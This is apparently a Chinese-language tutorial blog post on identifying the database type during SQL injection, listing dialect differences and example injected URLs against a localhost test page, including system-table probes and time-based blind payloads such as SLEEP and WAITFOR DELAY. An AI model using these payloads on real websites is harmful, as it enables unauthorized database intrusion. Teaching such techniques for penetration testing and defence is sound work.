SQL注入如何判断数据库类型

前言

在进行SQL注入之前,首先应该判断数据库的类型,不同的数据库在处理一些函数的时候会有一些微妙的差别,只有判断出是哪种数据库类型,这样才能根据数据库的类型选择合适的函数,更容易实现SQL注入。

# 前端与数据库类型

asp:SQL Server,Access

.net:SQL Server

php:MySQL,PostgreSQL

java:Oracle,MySQL

# 根据端口判断

Oracle:默认端口 1521

SQL Server:默认端口 1433

MySQL:默认端口 3306

# 根据数据库特有函数来判断

# len和length

len():SQL Server 、MySQL以及db2返回长度的函数。

length():Oracle和INFORMIX返回长度的函数。

# version和@@version

version():MySQL查询版本信息的函数

@@version:MySQL和SQL Server查询版本信息的函数

# substring和substr

MySQL两个函数都可以使用

Oracle只可调用substr

SQL Server只可调用substring

# 根据特殊符号进行判断

/* 是MySQL数据库的注释符

-- 是Oracle和SQL Server支持的注释符

;  是子句查询标识符,Oracle不支持多行查询,若返回错误,则说明可能是Oracle数据库

#  是MySQL中的注释符,返回错误则说明可能不是MySQL,另外也支持-- 和/**/

# 根据数据库对字符串的处理方式判断

# MySQL

http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab' 

http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab'

# Oracle

http://127.0.0.1/test.php?id=1 and 'a'||'b'='ab'

http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab' 

# SQL Server

http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab' 

# 根据数据库特有的数据表来判断

# MySQL(version>5.0)

http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1

# Oracle

http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1

# SQL Server

http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1

# 根据盲注特别函数判断

# MySQL

BENCHMARK(1000000,ENCODE('QWE','ASD'))

SLEEP(5)

# PostgreSQL

PG_SLEEP(5)

GENERATE_SERIES(1,1000000)

# SQL Server

WAITFOR DELAY '0:0:5'
相关推荐
慕舟舟1 分钟前
Windows密码的网络认证---基于挑战响应认证的NTLM协议
windows·网络安全
聚铭网络2 分钟前
案例精选 | 河北省某检察院安全运营中异构日志数据融合的实践探索
网络安全
小爬虫程序猿4 分钟前
如何利用Python解析API返回的数据结构?
数据结构·数据库·python
wowocpp1 小时前
查看 磁盘文件系统格式 linux ubuntu blkid ext4
linux·数据库·ubuntu
芯盾时代5 小时前
数字身份发展趋势前瞻:身份韧性与安全
运维·安全·网络安全·密码学·信息与通信
Ai 编码助手7 小时前
MySQL中distinct与group by之间的性能进行比较
数据库·mysql
陈燚_重生之又为程序员7 小时前
基于梧桐数据库的实时数据分析解决方案
数据库·数据挖掘·数据分析
caridle7 小时前
教程:使用 InterBase Express 访问数据库(五):TIBTransaction
java·数据库·express
白云如幻7 小时前
MySQL排序查询
数据库·mysql
萧鼎7 小时前
Python并发编程库:Asyncio的异步编程实战
开发语言·数据库·python·异步